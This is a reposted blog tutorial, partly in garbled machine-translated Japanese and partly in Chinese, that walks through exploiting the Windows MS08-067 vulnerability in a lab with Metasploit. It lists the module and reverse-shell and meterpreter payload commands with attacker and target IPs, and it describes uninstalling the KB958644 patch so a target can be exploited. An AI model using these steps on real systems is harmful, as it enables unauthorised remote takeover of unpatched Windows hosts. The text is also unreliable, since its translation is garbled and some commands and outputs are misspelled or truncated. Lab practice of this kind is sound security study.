MS08-067

簡単な脆弱性

    ms08- 067 エディタを議論

MS08を -067脆弱性がサーバー以外のWindowsに影響を及ぼし2008など、Windowsのコア以外のすべてのシステム、対象:Windows 2000 / XP / Serverの2003 / Vistaの/ Server 2008人のバージョン、およびWindowsさえのテストフェーズが含ま7プロ- ベータ版。

中国名の
    MS08 - 067  
英語名の
    MS08 - 067  

発売日:
    日2008年 / 10 / 22  
ダウンロードサイズ:
    オペレーティングシステム固有に応じて
カテゴリの
    脆弱性の

説明:マイクロソフトセキュリティ情報KB958644 
脆弱性:サーバーサービスは、リモートでコードが実行される脆弱性により
日:日2008年 / 10 / 22  
ダウンロードサイズ:オペレーティングシステムによって異なります。
影響を受けるオペレーティング・システム:Windows2000 ; XP、サーバー2003 ;ビスタ;サーバー2008 ; 7 ベータ版の
概要
このセキュリティ更新プログラムは、Serverサービスの秘密のレポートで脆弱性を解決します。ユーザは、影響を受けるシステムに特別に細工したRPCリクエストを受け取った場合、この脆弱性により、リモートでコードが実行される可能性があります。マイクロソフトではWindowsでは2000、Windows XPのサーバーおよびWindows 2003 システム上でこの脆弱性を悪用し、任意のコードを実行するための認証なしで攻撃される可能性があります。この脆弱性は、ワーム攻撃に使用することができます。ファイアウォールによる最善策および標準のファイアウォールの既定の構成は、エンタープライズ境界の外部から行われる攻撃からネットワークリソースを保護することができます。この更新プログラムをインストールすると、お使いのコンピュータを保護することができます。インストールが完了したら、コンピュータを再起動する必要があります。
深刻度:Windowsの2000 ; XP、Server 2003には、深刻な、Windows Vistaのです。サーバー2008 ; 7ベータ版が重要です。

0X02戦闘

ドローンIP 192.168.1.134の窓

攻撃機192.168.1.137カーリー

最初の試みは、pingを実行することはできません

pingを実行することができます 

MS08_067リモートの攻撃の練習:シェル

オープンmsfconsoleのカリ端末1、。

2その後、抜け穴を見つけるために、このメソッドを使用します

msf5> 検索ms08_067 

マッチングモジュール
 ================ 

   #名前ディスクロージャー日付ランクチェックの説明
    - ---- --------------- - --- ----- -----------
    0   活用/窓/ SMB / ms08_067_netapi   日2008年 - 10 - 28        偉大はいMS08- 067 Microsoftサーバーサービス相対パススタック破損

図3は、コマンドを入力してuse exploit/windows/smb/ms08_067_netapi、脆弱性モジュールの使用を入力してください。

4、入力コマンドは、show payload以下に示すように、我々はshell_reverse_tcpを発見した、効果的な攻撃の負荷を表示します。

図5に示すように、コマンドはshow targets以下に示すように、無人機のオペレーティングシステムのモデルを攻撃することが示されます。

図6は、コマンドを使用するとset payload generic/shell_reverse_tcp、攻撃のペイロードを設定します。

7、コマンドを入力します。show options我々は、図の赤いボックス囲まれた部分として、攻撃前に設定する必要があるデータが表示されます。

8、コマンドを入力します。

msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.1.137
LHOST => 192.168.1.137
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST  192.168.1.134
RHOST => 192.168.134

然后9、输入命令exploit开始攻击,如下图所示是正常攻击成功结果。

返回seesion就可以拿到shell

Seeion –L

就你可以看见这个shell

Seeions –I 1

进入shell

 下面是转的别人的

MS08_067远程漏洞攻击实践:meterpreter

1、前面依然使用命令use exploit/windows/smb/ms08_067_netapi,进入ms08_067漏洞模块。

2、设置payload:set payload windows/meterpreter/reverse_tcp

3、show options,查看需要设置的ip地址,如下图所示,是已经设置好的

4、成功攻击结果:

5、执行ifconfig,查看靶机地址:

6、ps查看进程:

7、meterpreter转shell:

实验中遇到的问题

1、在做实验的时候用老师的xp系统作为靶机,但是在exploit的时候显示如下:no session was created。

2、手动设置一个set session 1,结果还是不成功。

3、在exploit前,使用check查看靶机状态,返回以下信息,表明目标主机是安全的,不能被攻击。

4、网上查到可以卸载ms08_067的补丁,即卸载KB958644,文件路径:c:/windows找到KB958644(这是个隐藏文件),打开卸载exe程序,如下:

5、重启后,还是不能成功,最后找了一个英文版的win xp sp 3 ,才成功完成。

おすすめ

転載: www.cnblogs.com/-zhong/p/11058602.html